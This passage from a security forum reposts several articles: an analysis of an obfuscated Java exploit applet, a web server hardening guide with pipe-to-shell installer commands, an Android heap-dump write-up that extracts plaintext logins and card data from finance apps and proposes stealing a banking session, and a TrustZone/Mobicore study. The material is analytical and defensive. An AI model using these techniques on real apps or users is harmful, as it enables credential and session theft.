At this point I should say that I was biased. I had read a McAfee report (http://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24588/en_US/McAfee_Labs_Threat_Advisory_STYX_Exploit_Kit.pdf) about a similar campaign using the same Exploit Kit. In this report they said that the vulnerability used by this particular HTML inside the kit was CVE-2013-0422. Usually the first clue to confirm this would be verdicts from AV vendors, but this time that was not the case:

https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/

Ok, so let's take a look at the decompiled code, starting from the entry point. We can confirm that the ZqnpOsRRk class is implementing the Applet:

package QPAfQoaG;

import java.applet.Applet;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class ZqnpOsRRk extends Applet

But quickly we see that something is not working. The names of the classes and methods are random and the strings obfuscated, but this is nothing to worry about.
However in this case we see that the decompiler is showing strange "code":

public ZqnpOsRRk()
{
    (-0.0D);
    return;
    1L;
    2;
    1;
}

Or it is not able to decompile methods of the class directly and just shows the bytecode as comments:

public void ttiRsuN() throws Throwable
{
    // Byte code:
    // 0: ldc_w 10
    // 3: iconst_4
    // 4: ineg
    // 5: iconst_5
    // 6: ineg
    // 7: pop2
    // 8: lconst_0
    // 9: pop2

Now I was starting to wonder how bad the situation was. Could I still get enough information to discover which CVE is exploited by this .jar? Time for some serious digging!

I started to rename the classes based on their first letters (ZqnpOsRRk to Z, CvSnABr to C, etc.) and to match the methods with what I thought they were doing. It's much like any RE work using IDA. There was a lot of "strange" code around, which got strange interpretations from the decompiler. I decided to delete it to tidy up the task. Of course, there was a risk that I might delete something important, but this time it looked like misinterpretations of the bytecode, dead code and unused variables. So I deleted things like:

public static String JEeOqvmFU(Class arg0)
{
    (-5);
    (-2.0F);
    return 1;

Where I saw commented bytecode (not decompiled by JD-GUI), I deleted everything but the references to functions/classes. At the end I had much cleaner code, but I was very worried that I might be missing important parts. For instance, I had procedures which just returned NULL, functions which just declared variables, unused variables, etc. How much of this, if any, was part of the exploit and how much was just badly interpreted code? At least I was able to get something useful after cleaning the code.
I was able to localize the function used to deobfuscate the strings:

public static String nwlavzoh(String mbccvkha)
{
    byte[] arrayOfByte1 = mbccvkha.getBytes();
    byte[] arrayOfByte2 = new byte[arrayOfByte1.length];
    for (int i = 0; i < arrayOfByte1.length; i++)
        arrayOfByte2[i] = ((byte)(arrayOfByte1[i] ^ 0x44));
    return new String(arrayOfByte2);
}

Not exactly rocket science. Now I could deobfuscate all the strings, but I still didn't have a clear idea of what was happening in this .jar.

Step 2: Different strategy

Seeing that the code was not decompiled properly, I remembered that to check which vulnerability is being exploited you don't really need fully decompiled code. Finding the right clues can point you to the right exploit. At this point I thought that it might be CVE-2013-0422, so I decided to get more information about this vulnerability and see if I could find something in the code to confirm this. This CVE was discovered in January 2013. Oracle was having a bad time just then, and shortly afterwards a few other Java vulnerabilities were exposed. I downloaded a few samples from VirusTotal with this CVE. All of them were easily decompiled and I saw some ways to implement this vulnerability. But there was no big clue.

I also decided to try a few other decompilers, but still got no results. However, when taking a second look at the results of running a now-obsolete JAD, I saw that the decompiled code was quite different from that of JD-GUI, even though it was still incomplete and unreadable. But there were different calls with obfuscated strings to the deobfuscation function. The applet uses a class loader with the obfuscated strings to avoid detection, making it difficult to know what it is loading without the properly decompiled strings. But now I had all of them!
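The routine is just a single-byte XOR with 0x44, so it is trivial to re-implement outside the applet. Below is a minimal Python sketch of the same logic (the function name is taken from the sample; the script itself is mine, presumably doing the same job as the one used to recover the strings):

```python
def nwlavzoh(obfuscated: str) -> str:
    """Mirror of the applet's string deobfuscator: XOR every byte with 0x44."""
    return "".join(chr(ord(c) ^ 0x44) for c in obfuscated)

# XOR is its own inverse, so the same routine obfuscates and deobfuscates.
print(nwlavzoh("'+)j71*j.)<j"))  # -> com.sun.jmx.
```

Feeding the obfuscated constants recovered from the bytecode through this routine yields the class and method names.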
After running the script I got:

com.sun.jmx.mbeanserver.JmxMBeanServer
newMBeanServer
javax.management.MbeanServerDelegate
boolean
getMBeanInstantiator
findClass
sun.org.mozilla.javascript.internal.Context
com.sun.jmx.mbeanserver.Introspector
createClassLoader

Now this was much clearer and more familiar to me. I had another look at one of the PDFs I had just been reading and bingo! https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf

So finally I could confirm the CVE was indeed CVE-2013-0422.

Step 3: Why didn't the Java Decompiler work?

In these cases it is always possible to take another approach and do some dynamic analysis, debugging the code. If you want to go this way I recommend reading this for the setup: Understanding Java Code and Malware | Malwarebytes Unpacked

However, I couldn't stop thinking about why all the decompilers failed with this code. Let's take a look at the decompiled bytecode manually. We can easily get it like this:

javap -c -classpath LOCAL_PATH ZqnpOsRRk > ZqnpOsRRk.bytecode

Let's take a look at the code we get and what it means, with an eye on the decompiled code. We will need this: Java bytecode instruction listings - Wikipedia, the free encyclopedia

public QPAfQoaG.ZqnpOsRRk();
0: aload_0
1: invokespecial #1; //Method java/applet/Applet."<init>":()V
4: dconst_0   << push 0D
5: dneg       << -0D
6: pop2       << pop -0D
7: nop
8: return
9: lconst_1   << dead code from here
10: pop2
11: goto 14
14: iconst_2
15: iconst_2
16: pop2
17: iconst_1
18: pop

and the decompiled code with the corresponding instruction numbers:

public class ZqnpOsRRk extends Applet
{
    public ZqnpOsRRk()
    {
        (-0.0D);
        return;
        1L;
        2;
        1;
    }

So we can see how a method which does nothing but return leaves a lot of garbage in the middle. The decompiler cannot handle this and tries to interpret all these operations, these anti-decompilation artifacts. It just adds a lot of extra noise to the final results. We can safely delete all this.
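Deleting this junk can even be done mechanically. A rough, stack-unaware Python heuristic (my own sketch, not anything from JD-GUI or JAD) over javap-style mnemonics, matching the push/neg/pop runs seen in the constructor above:

```python
# Junk patterns seen in the applet: constants pushed, optionally negated or
# swapped, then immediately discarded with pop/pop2.  Everything else is kept.
PUSHES = ("iconst_", "lconst_", "fconst_", "dconst_", "ldc")
NEUTRAL = ("ineg", "lneg", "fneg", "dneg", "swap")

def strip_dead_code(opcodes):
    """Drop push/neg/pop junk runs from a list of javap mnemonics.

    Naive heuristic: it only matches the simple shapes shown in the article,
    it is not a stack-accurate analysis.
    """
    out, pending = [], []
    for op in opcodes:
        if op == "nop":
            continue                 # nops are pure padding
        if op.startswith(PUSHES) or op in NEUTRAL:
            pending.append(op)       # possibly junk: hold it back
        elif op in ("pop", "pop2") and pending:
            pending = []             # junk confirmed: discard the whole run
        else:
            out.extend(pending)      # real instruction: flush anything held
            pending = []
            out.append(op)
    out.extend(pending)
    return out

print(strip_dead_code(["aload_0", "invokespecial", "dconst_0",
                       "dneg", "pop2", "nop", "return"]))
# -> ['aload_0', 'invokespecial', 'return']
```

Run on the constructor's opcode list, it leaves exactly the three instructions that matter.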
public class ZqnpOsRRk extends Applet
{
    public ZqnpOsRRk()
    {
        return;
    }

There are TONS of these artifacts in the bytecode. Here are a few examples:

1: lconst_0
2: lneg
3: pop2

1: iconst_5
2: ineg
3: iconst_1
4: ineg
5: pop2

1: iconst_5
2: ineg
3: iconst_5
4: swap
5: pop2

There are also a lot of nonsense jumps, such as push NULL then jump-if-null, gotos and nops. Basically it's difficult to delete these constructs from the bytecode because the parameters are different and don't always produce the same opcodes. It's up to the decompiler to get rid of this dead code.

After a couple of hours manually cleaning the code and reconstructing it from the bytecode, I could finally read the result and compare it with the original decompiled one. Now that I understood what was happening and what was wrong with the original code, I could safely delete the dead code and introduce readable names for classes and methods.

But there was still one unanswered question: why was the first decompiler unable to deobfuscate all the strings, and why did I have to use JAD to get everything? JD-GUI returns the bytecode of the methods that it cannot decompile, but for instructions such as ldc (which pushes a constant onto the stack) it does not include the constant along with the instruction in the output code. That's why I couldn't get them until I used a second decompiler. For example:

JD-GUI output:
// 18: ldc 12

Bytecode output:
18: ldc #12; //String '+)j71*j.)<j)&!%*7!62!6j^N)<t^F!%*^W!62!6

JAD output:
class1 = classloader.loadClass(CvSnABr.nwlavzoh("'+)j71*j.)<j)&!%*7!62!6j16)<t06!%*27!62!6"));

In the bytecode, happily, we can find all these references and complete the job.

Final thoughts

When I was working on this binary I remembered a presentation at BH 2012 about anti-decompiling techniques used for Android binaries. This was the first time I had personally encountered a Java binary implementing something similar.
Even though they are not that difficult to avoid, the analysis is much slower and it can be really hard to crack big binaries. So there are two open questions: first, what can be done, from the decompiler's perspective, to avoid these tricks? I'm hoping to discuss this with the authors of JD-GUI. Secondly, how can we make code "undecompilable"? Are there automatic tools for this? Again, I'm hoping to find out more, but please contact me if you have anything useful to share.

Sursa: https://www.securelist.com/en/analysis/204792300/Anti_decompiling_techniques_in_malicious_Java_Applets
  16. WEB SERVER SECURITY

Rohit Shaw
August 16, 2013

This article gives you a short and understandable summary of web servers, the different types of servers, the security add-on software installation process, and security aspects. In this article we will learn the installation of a control panel and the benefits of add-on security software.

Web servers, just as a general introduction, are the big computers that serve as website hosts for a particular organization. The common characteristics that web servers have are public IP addresses and domain names. This information may sound boring but is offered for beginners. Security is a standard that has developed to protect the web server from intrusions, hacking attempts, and other malicious uses.

A brief introduction to the types of web servers: there are those based on Microsoft Windows and those based on Linux, which are respectively named Microsoft IIS Server and Apache (these are the most common, although there are others like Nginx, Cherokee, and Zeus). Throughout my article, I will introduce the techniques of hardening a web server, which plays a chief role in web server security. The attack vectors on a web server depend on both the security of the web applications hosted on the server and the security of the web server itself (which includes operating system hardening, application server hardening, etc.).

Starting with web server security, the first point of analysis for exploiting the server would be the services. I would suggest that all server security administrators run a scan to check which ports are open, filtered, and closed. One of the best tools for scanning the network is Nmap.

Use a control panel for managing the hosted websites on the server. There are many control panels available, such as cPanel, Parallels Plesk, DirectAdmin, Webmin, ISPConfig, Virtualmin, etc.
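Coming back to the port-enumeration advice above for a moment: before reaching for a full Nmap run, a quick TCP connect check can be sketched in a few lines of Python. This is only a crude stand-in (a plain connect() cannot distinguish "filtered" from "closed" the way Nmap's SYN scan can), and the host and ports below are placeholders:

```python
import socket

def check_port(host, port, timeout=1.0):
    """Return 'open' if a TCP connection succeeds, else 'closed/filtered'."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except OSError:  # connection refused, timed out, unreachable, ...
            return "closed/filtered"

# Placeholder target and ports; point this at your own server only.
for port in (21, 22, 80, 443, 3306):
    print(port, check_port("127.0.0.1", port))
```

For a real audit the advice above stands: use Nmap, which properly reports open, filtered, and closed states.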
The chief benefit of using a control panel is that it provides a graphical web-based interface with a client-side interface. It is extremely easy to navigate, with an icon-based menu on the main page. A server administrator can use a control panel to set up new websites, email accounts and DNS entries. With the control panel, you can also upgrade and install new software. After that, install Atomic Secured Linux (ASL) on your web server; it is an add-on for Linux systems. We will discuss ASL later in this article.

Now I am going to show you how to set up a control panel on a web server. Here we are going to install cPanel and WHM (Web Host Manager).

cPanel Setup Manual

Prerequisites: Before installing cPanel we need to fulfill some conditions:

Your IP must be static before purchasing cPanel. It will not work properly with a dynamic IP address.

The hostname on your server must be a fully qualified host name (FQHN); for example, web.domain.com. You can change the "hostname=" line in /etc/sysconfig/network and then you must restart your network.

Hostname change: For changing the hostname, there are usually three steps, as follows:

Sysconfig/Network — Open the /etc/sysconfig/network file with any text editor. Modify the HOSTNAME= value to match your FQHN hostname.

# vi /etc/sysconfig/network
HOSTNAME=myserver.domain.com

Hosts file — Change the host that is associated with your main IP address for your server; this is for internal networking. (Found at /etc/hosts)

Run hostname — This command allows modifying the hostname on the server, but it will not actively update all programs that are running under the old hostname.

Restart networking: After completing the above prerequisites and requirements, we restart networking so the system accepts the changes.
We can restart it by using this command:

# /etc/init.d/network restart

Downloading cPanel: After registering your IP, input the following command as root in the terminal:

wget http://www.layer1.cpanel.net/latest

cPanel installation: After downloading the installer file, type in the following command as root:

sh latest

After the install is complete, you should see this: "cPanel Layer 2 install complete." Now point your web browser to port 2086 or 2087 by providing your IP address directly in the web browser:

https://youriphere:2087

NOTE: There is no method of uninstalling cPanel. You will have to reload the operating system.

Now, after installing cPanel, the server is protected against rooting attacks, which hackers use for compromising all websites that are hosted on the same server. But the main critical threats are PHP shell execution and DDoS attacks on the server, which are not prevented by using cPanel. So we started looking for an anti-DDoS solution on the Internet and found one, called Atomic Secured Linux.

Atomic Secured Linux

Atomic Secured Linux is an easy-to-use, out-of-the-box unified security suite add-on for Linux systems, designed to protect servers against zero-day threats. Unlike other security solutions, ASL is designed for beginners and experts alike. You just install ASL on your existing system and it does all the work for you. This add-on was developed to create a unique security solution for beginners and experts.

ASL works by combining security at all layers, from the firewall to the applications and services and all the way down to the kernel, to provide the most complete multi-spectrum protection solution available for Linux servers today. It helps to ensure that your system is secure and also compliant with commercial and government security standards.
Features:

Complete intrusion prevention
Stateful firewall
Real-time shunning/firewalling and blocking of attack sources
Brute force attack detection and prevention
Automatic self-healing system
Automated file upload scanning protection
Built-in vulnerability and compliance scanner and remediation system
Suspicious event detection and notification
Denial of service protection
Malware/antivirus protection
Auto-learning role-based access control
Data loss protection and real-time web content redaction system
Automated secure log management with secure remote logging
Web-based GUI management
Kernel protection
Built-in virtualization
Auto healing/hardening

Atomic Secured Linux works on various platforms, such as CentOS, Red Hat Enterprise Linux, Scientific Linux, Oracle Linux, and CloudLinux. It also supports many control panels, including cPanel, Virtualmin, DirectAdmin, Webmin, and Parallels Plesk.

Now I am going to show you how to install Atomic Secured Linux. It is quite easy to install. Open a root terminal and type in:

wget -q -O - https://www.atomicorp.com/installers/asl | sh

Follow the instructions in the installer, being sure to answer the configuration questions appropriately for your system. Once the installation is complete, you will need to reboot your system to boot into the new hardened kernel that comes with ASL. You do not have to use this kernel to enjoy the other features of ASL, but we recommend that you use it, because it includes many additional security features that are not found in non-ASL systems.

Now log in to your GUI at https://youriphere:30000. You can view alerts, block attackers, configure ASL, and use its many features from the GUI. It protects from cross-site scripting, SQL injection, remote code inclusion, and many other web-based attacks. It intelligently detects search engines to prevent accidental blocking of web crawlers.
It detects suspicious events and events of importance and sends alerts about events such as privilege escalation, software installation and modification, file privilege changes, and more. ASL detects suspicious processes, files, user actions, hidden ports, kernel activity, open ports, and more. It has a built-in vulnerability and compliance scanner and remediation system to ensure that your system is operating in a safe, secure, and compliant manner. It automatically hardens Linux servers based on security policies and ships with a world-class set of policies developed by security experts. It also automatically disables unsafe functions in web technologies such as PHP to help prevent entire classes of vulnerabilities; for example, executing PHP shells.

It detects and blocks brute force and "low and slow" attacks on web applications and intelligently identifies when a web application has denied access, even for login failures. Alerting is done for all domains hosted on a server. The graphical user interface of the firewall is easy to use and maintain. The advanced configuration of ASL allows handling of PHP shell functions, antivirus, mod_security rules, Rootkit Hunter, etc.

Hence we conclude that, after doing these things, your web server will be secured from attacks. Nowadays, most of the websites that get hacked are hosted on a shared server. An attacker's main method is to upload a PHP shell to a web server through a vulnerable website, from which the attacker can deface all websites hosted on that server. That's why we suggest using cPanel: cPanel provides separate accounts for all website owners, so if an attacker can upload a PHP shell through one website, he will not have access to all the other websites hosted on that server; he can only deface that particular site. We also discussed Atomic Secured Linux: it blocks and alerts on all types of attacks.
Specifically, it blocks the PHP shell functions and prevents PHP shells from executing on the web server.

References

CentOS/RHEL - Installing cPanel & WHM 11.24 | Knowledge Center | Rackspace Hosting
https://www.atomicorp.com/products/asl.html

Sursa: WEB SERVER SECURITY
  17. x86 Code Virtualizer Src

Fh_prg

Hello everybody. Here is my code virtualizer source code, now public. Download and enjoy.

Attached Files: VM.zip (153.9 KB, 48 views)

Sursa: x86 Code Virtualizer Src
  18. rstforums.com/forum/74095-coca-cola-666-a.rst OMG, RST is possessed! FALSE. We are the devils; we cannot be possessed.
  19. Great, I hope a few of them will be open-source too.
  20. Everyone is coming to the South.
  21. Red Hat CEO: Go Ahead, Copy Our Software

While most companies fight copycats, Red Hat embraces its top clone, CentOS. Here's how that helps it fight real enemies like VMware.

Matt Asay
August 13, 2013

Imagine your company spent more than $100 million developing a product. Now imagine that a competitor came along and cloned your product and distributed a near-perfect replica of it. Not good, right? If you're Apple, you spend years and tens of millions of dollars fighting it, determined to be the one and only source of your product. If you're Red Hat, however, you embrace it—as Red Hat CEO Jim Whitehurst told ReadWrite in an interview.

After Unix

For years the enterprise data center was defined by expensive hardware running varieties of the Unix operating system. Over time, both Windows and Linux chewed into Unix's market share, with Red Hat winning the bulk of the Linux spoils. The key to victory? Both Windows and Linux offered low-cost, high-value alternatives to Unix's sky-high pricing. With Unix cowering in a corner, one would think that the battle would shift to Linux versus Windows. The reality, however, is somewhat different. As Whitehurst tells it, Red Hat "certainly competes" with Microsoft, but "generally those IT decisions are made at the architecture level before you get into a specific Linux versus Windows bake-off." Today enterprise architecture tends to be Linux-based, while 10 years ago it was Windows, which means that more often than not, Red Hat Enterprise Linux is baked into enterprise IT decisions. "Going forward with new workloads, they are heavily Linux-based," notes Whitehurst. As such, Whitehurst doesn't "worry about Microsoft long-term, because it's Red Hat and VMware that are defining future data center strategy."

Taking On VMware

Ah, yes, VMware. Sun Microsystems, in its day the leading Unix vendor but now swallowed up by Oracle, once provided Red Hat with a handy villain to target.
Today data-center software maker VMware is Red Hat's Enemy Number One. The reason is simple: No other company more closely matches Red Hat's ambitions, albeit with a very different approach. As Whitehurst emphasizes, "When you start thinking about where the future of the data center is going, VMware has a similar view to ours, but they're doing it with a proprietary innovation model and we're open."

How open? So open that not only is Red Hat fighting VMware with its own open-source products, but it's also embracing clones like CentOS. While open source is increasingly established within the technology world, few understand its implications for an open-source software business. In the case of Red Hat, it develops the popular Red Hat Enterprise Linux (RHEL) operating system. But because Linux is a community-developed OS, Red Hat must release all of its Linux code to others. (Instead of charging for a software license per se, Red Hat has customers pay for a subscription that covers services and support.) This paves the way for an organization like CentOS to develop "a Linux distribution derived from ... a prominent North American Enterprise Linux vendor" which "aims to be 100% binary compatible" with that Linux vendor. It's the imitator that dare not speak its name, but everyone knows CentOS is a like-for-like Red Hat clone. How can this possibly be good for Red Hat?

Embracing The Parasite

While some like Microsoft have threatened Red Hat with the specter of even greater competition from CentOS, Whitehurst argues that CentOS "plays a very valuable role in our ecosystem." How? By ensuring that Red Hat remains the Linux default:

CentOS is one of the reasons that the RHEL ecosystem is the default. It helps to give us an ubiquity that RHEL might otherwise not have if we forced everyone to pay to use Linux. So, in a micro sense we lose some revenue, but in a broader sense, CentOS plays a very valuable role in helping to make Red Hat the de facto Linux.
But couldn't another Linux vendor like SuSE or Canonical, the primary backer of Ubuntu, undercut Red Hat with an equally free OS? If $0 is the magic price point, other Linux vendors can easily match that, right? Whitehurst responds: "SuSE often comes in at a lower price point than RHEL, but most people would prefer to have a common code base like RHEL plus CentOS than a cheaper but always fee-based enterprise SuSE." In other words, only Red Hat can offer the industry's leading Linux server OS and also offer—albeit indirectly—that same product for free.

Microsoft has tacitly acknowledged a similar phenomenon: While the company spends heavily to fight piracy, founder Bill Gates noted in 1998 that illegal copies of its Windows operating system in China helped seed demand for the paid version. While I'm sure Red Hat's sales force doesn't love competing with its copycat, the reality is that sales are almost certainly helped in accounts that only want RHEL for production servers and can shave costs by using CentOS for development and test servers. CentOS, in other words, gives Red Hat a lot of pricing leverage, without having to lower its prices.

Embracing Developers

Arguably one critical area where CentOS hasn't helped Red Hat is with developers. While developers want the latest and greatest technology, Red Hat's bread-and-butter audience over the years has been operations departments, which want stable and predictable software. (Read: boring.) CentOS, by cloning RHEL's slow-and-steady approach to Linux development, is ill-suited to attracting developers. So Red Hat is trying something different, dubbed Red Hat Software Collections. Collections includes "a collection of refreshed and supported web/dynamic languages and databases for Red Hat Enterprise Linux." Basically, Collections gives developers a faster-moving development track within slower-moving RHEL.
Or, as Whitehurst tells it, "Collections is Red Hat's way of embracing developers while keeping its appeal for operations." It will be interesting to see how this plays out. Red Hat has a long way to go in its goal to define the open data center, but with its embrace of CentOS to give it licensing leverage and of Collections to give it developer credibility, Red Hat is on the right track.

Sursa: http://readwrite.com/2013/08/13/red-hat-ceo-centos-open-source
  22. [h=1]Poking Around in Android Memory[/h]

Tags: memory, analysis, mobile, programming, public — etienne @ 16:31

Taking inspiration from Vlad's post I've been playing around with alternate means of viewing traffic/data generated by Android apps. The technique that has given me the most joy is memory analysis. Each application on Android is run in the Dalvik VM and is allocated its own heap space. Android being Android, free and open, numerous ways of dumping the contents of the application heap exist. There's even a method for it in the android.os.Debug library: android.os.Debug.dumpHprofData(String filename). You can also cause a heap dump by issuing the kill command:

kill -10 <pid number>

But there is an easier way: use the official Android debugging tools. The Dalvik Debug Monitor Server (DDMS) "provides port-forwarding services, screen capture on the device, thread and heap information on the device, logcat, process, and radio state information, incoming call and SMS spoofing, location data spoofing, and more." Once DDMS is set up in Eclipse, it's simply a matter of connecting to your emulator, picking the application you want to investigate and then dumping the heap (hprof).

1.) Open DDMS in Eclipse and attach your device/emulator

* Set your DDMS "HPROF action" option to "Open in Eclipse" - this ensures that the dump file gets converted to standard Java hprof format and not the Android version of hprof. This allows you to open the hprof file in any Java memory viewer.

* To convert an Android hprof file to Java hprof use the hprof converter found in the android-sdk/platform-tools directory:

hprof-conv <infile> <outfile>

2.) Dump hprof data

Once DDMS has done its magic you'll have a window pop up with the memory contents for your viewing pleasure. You'll immediately see that the application's UI objects and other base classes are in the first part of the file. Scrolling through, you will start seeing the values of variables stored in memory.
To get to the interesting stuff we can use the command line.

3.) strings and grep the .hprof file (easy stuff)

To demonstrate the usefulness of memory analysis, let's look at two finance-oriented apps. The first application is a mobile wallet application that allows customers to easily pay for services without having to carry cash around. Typically one would do some static analysis of the application and then, when it comes to dynamic analysis, use a proxy such as Mallory or Burp to view the network traffic. In this case it wasn't possible to do this, as the application employed certificate pinning and any attempt to man-in-the-middle the connection caused the application to exit with a "no network connection" error.

So what does memory analysis have to do with network traffic? As it turns out, a lot. Below is a sample of the data extracted from memory:

And there we have it, the user login captured along with the username and password in the clear. Through some creative strings and grep we can extract a lot of very detailed information. This includes credit card information, user tokens and products being purchased. Despite not being able to alter data in the network stream, it is still easy to view what data is being sent, all this without worrying about intercepting traffic or decrypting the HTTPS stream.

A second example application examined was a banking app. After spending some time using the app and then doing a dump of the hprof, we used strings and grep (and some known data) to easily see what is being stored in memory:

strings /tmp/android43208542802109.hprof | grep '92xxxxxx'

Using part of the card number associated with the banking app, we can locate any references to it in memory. And we get a lot of information...

And there we go, a fully "decrypted" JSON response containing lots of interesting information. Grep'ing around yields other interesting values, though I haven't managed to find the login PIN yet (a good thing I guess). Next step?
Find a way to cause a memory dump in the banking app using another app on the phone, extract the necessary values and steal the banking session. Profit.

Memory analysis provides an interesting alternate means of finding data within applications, as well as allowing analysts to decipher how the application operates. The benefits are numerous, as the application "does all the work" and there is no need to intercept traffic or figure out the decryption routines used.

[h=3]Appendix:[/h]

The remoteAddress field in the response is very interesting, as it maps back to a range owned by Merck (one of the largest pharmaceutical companies in the world, Merck & Co. - Wikipedia, the free encyclopedia). No idea what it's doing in this particular app, but it appears in every session I've looked at.

- See more at: SensePost Blog
  23. A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Tags: mobile, programming, public, python — behrang @ 13:35

Introduction:

New types of mobile applications based on Trusted Execution Environments (TEE), most notably ARM TrustZone micro-kernels, are emerging which require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and the TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low-privileged Android processes and Mobicore-enabled kernel drivers such as an IPSEC driver.

Mobicore OS:

The Samsung Galaxy S III was the first mobile phone that utilized the ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel, named Mobicore, is isolated from the handset's Android operating system at the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses the TrustZone security extension of ARM processors to create a secure program execution and data storage environment that sits next to the rich operating system (Android, Windows, iOS) of the mobile phone or tablet. The following figure published by G&D demonstrates Mobicore's architecture:

Overview of Mobicore (courtesy of G&D)

A TrustZone-enabled processor provides "hardware level isolation" of the above "Normal World" (NWd) and "Secure World" (SWd), meaning that the "Secure World" OS (Mobicore) and programs running on top of it are immune to software attacks from the "Normal World" as well as a wide range of hardware attacks on the chip. This forms a "trusted execution environment" (TEE) for security-critical applications such as digital wallets, electronic IDs, Digital Rights Management, etc.
The non-critical part of those applications, such as the user interface, can run in the "Normal World" operating system while the critical code, private encryption keys and sensitive I/O operations such as "PIN code entry by user" are handled by the "Secure World". By doing so, the application and its sensitive data would be protected against unauthorized access even if the "Normal World" operating system was fully compromised by the attacker, as he wouldn't be able to gain access to the critical part of the application which is running in the secure world.

Mobicore API:

The security-critical applications that run inside Mobicore OS are referred to as trustlets and are developed by third parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets, as well as Android applications that communicate with the relevant trustlets via the Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). The Mobicore API for Android consists of the following 3 components:

1) Mobicore client library located at /system/lib/libMcClient.so: This is the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets in the secure world.

2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via the Mobicore device driver.

3) Mobicore device driver: Registers the /dev/mobicore misc device and performs ARM Secure Monitor Calls (SMC) to switch the context from NWd to SWd.

The source code for the above components can be downloaded from Google Code. I enabled the verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis.
Please note that you need to download the kernel source tree and stock ROM matching your S3 phone's kernel build number, which can be found in "Settings->About device". After compiling the new zImage file, you need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217", which has the option to unpack the zImage from the stock ROM, replace it with the newly compiled zImage and pack it again. By studying the source code of the user API library and observing debug messages from the kernel driver, I figured out the following data flow between the Android OS and Mobicore to establish a session and communicate with a trustlet:

1) The Android application calls the mcOpenDevice() API, which causes the Mobicore daemon (/system/bin/mcDriverDaemon) to open a handle to the /dev/mobicore misc device.
2) It then allocates a "World Shared Memory" (WSM) buffer by calling mcMallocWsm(), which causes the Mobicore kernel driver to allocate a WSM buffer of the requested size and map it into the user-space application process. This shared memory buffer is later used by the Android application and the trustlet to exchange commands and responses.
3) mcOpenSession() is called with the UUID of the target trustlet (a 10-byte value, for instance ffffffff000000000003 for the PlayReady DRM trustlet) and the allocated WSM address to establish a session with the target trustlet through the allocated shared memory.
4) Android applications have the option to attach additional memory buffers (up to 6, with a maximum size of 1 MB each) to the established session by calling the mcMap() API. In the case of the PlayReady DRM trustlet, which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving parameters and the other for receiving the trustlet's text output. 
5) The application copies the command and parameter types to the WSM, along with the parameter values in the second allocated buffer, and then calls the mcNotify() API to notify Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.
6) The mcWaitNotification() API is called with a timeout value and blocks until a response is received from the trustlet. If the response is not an error, the application can read the trustlet's returned data, output text and parameter values from the WSM and the two additional mapped buffers.
7) At the end of the session the application calls mcUnMap(), mcFreeWsm() and mcCloseSession().

The Mobicore kernel driver is the only component in the Android operating system that interacts directly with the Mobicore OS, by means of the ARM CPU's SMC instruction and secure interrupts. The interrupt number registered by the Mobicore kernel driver on the Samsung S3 phone is 47; it may differ on other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in the Android OS when it writes data back.

Analysis of a Mobicore session: There are currently 5 trustlets pre-loaded on the European S3 phones, as listed below:

shell@android:/ # ls /data/app/mcRegistry
00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin

07010000000000000000000000000000.tlbin is the "Content Management" trustlet, which is used by G&D to install and update other trustlets on target phones. 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM-related trustlets developed by Discretix. I chose to analyze the PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it is used by the Samsung VideoHub application, which is pre-loaded on the European S3 phones. 
The VideoHub application does not communicate directly with the PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins, including libdxdrmframeworkplugin.so, which depends on libDxDrmServer.so, the library that makes the Mobicore API calls. Both of these libraries are closed source, so I had to perform dynamic analysis to monitor communication between libDxDrmServer.so and the PlayReady trustlet. For this purpose, I could have installed API hooks in the Android DRM manager process (drmserver) to record the parameter values passed to the Mobicore user library (/system/lib/libMcClient.so), by setting the LD_PRELOAD environment variable in the init.rc script and flashing my phone with the new ROM. I found this approach unnecessary, as the source code for the Mobicore user library is available and I could add simple instrumentation code to it that saves API calls and the related world shared memory buffers to a log file. In order to compile such a modified Mobicore library, you would need to place it under the Android source code tree on a 64-bit machine (Android 4.1.1 requires a 64-bit machine to compile) with 30 GB of disk space. To save you the trouble, you can download a copy of my instrumented Mobicore user library from here. You need to create an empty log file at /data/local/tmp/log and replace the original library with the instrumented one (DO NOT FORGET TO BACK UP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and the PlayReady trustlet will be logged to /data/local/tmp/log. A sample of such a session log is shown below: The content and addresses of the world shared memory and the two additional mapped buffers are recorded in the log file. The command/response format in the WSM buffer is very similar to APDU communication in smart card applications, and this is no surprise, as G&D has a long history in smart card technology. 
The next step is to interpret the command/response data, so that we can manipulate it later and observe the trustlet's behavior. The trustlet's text output, together with inspection of the assembly code of libDxDrmServer.so, helped me figure out the PlayReady trustlet command and response format as follows:

client command (wsm): 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000

